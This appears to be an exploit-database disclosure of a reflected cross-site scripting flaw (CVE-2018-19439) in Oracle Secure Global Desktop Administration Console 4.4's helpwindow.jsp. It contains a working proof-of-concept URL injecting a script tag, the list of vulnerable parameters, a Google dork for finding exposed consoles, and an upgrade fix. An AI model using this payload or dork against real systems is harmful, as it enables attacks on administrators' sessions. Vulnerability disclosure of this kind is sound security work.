Oracle Secure Global Desktop Administration Console 4.4 Cross Site Scripting Vulnerability

2018-11-26
ID: 100353
CVE: None
Download vulnerable application: None
<!--
# Exploit Title: Cross Site Scripting in Oracle Secure Global Desktop
Administration Console - 4.4; Build: 20080807152602
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.oracle.com/
# Software Link: http://www.oracle.com/
# Version: Oracle Secure Global Desktop Administration Console - 4.4;
Build: 20080807152602
# Tested on: all
# CVE : CVE-2018-19439
# Category: webapps
 1. Description
 Cross Site Scripting exists in the Administration Console in Oracle Secure
Global Desktop 4.4 20080807152602. The page "helpwindow.jsp" has reflected
XSS via all parameters.
  2. Proof of Concept
 http://X.X.X.X/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelp
Window></TITLE></HEAD><body><script>alert("XSS")</script><!--&
> helpFile=concepts.html&pageTitle=Administrator
Help&mastheadUrl=/images/productNameSecondaryMasthead.png&mastheadDescription=Sun
Secure Global Desktop
Administration&jspPath=/sgdadmin/faces/com_sun_web_ui/help/&mastheadHeight=40&mastheadWidth=20
 Vulnerables parameters:
windowTitle, helpFile, pageTitle, mastheadUrl, mastheadDescription,
jspPath, mastheadHeight and mastheadWidth.
 Google dorks:
inurl:"/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"
  3. Solution:
 Update to the latests version Oracle Secure Global Desktop Administration
Console 5.4.
 -->
1.1.11-prod (www01)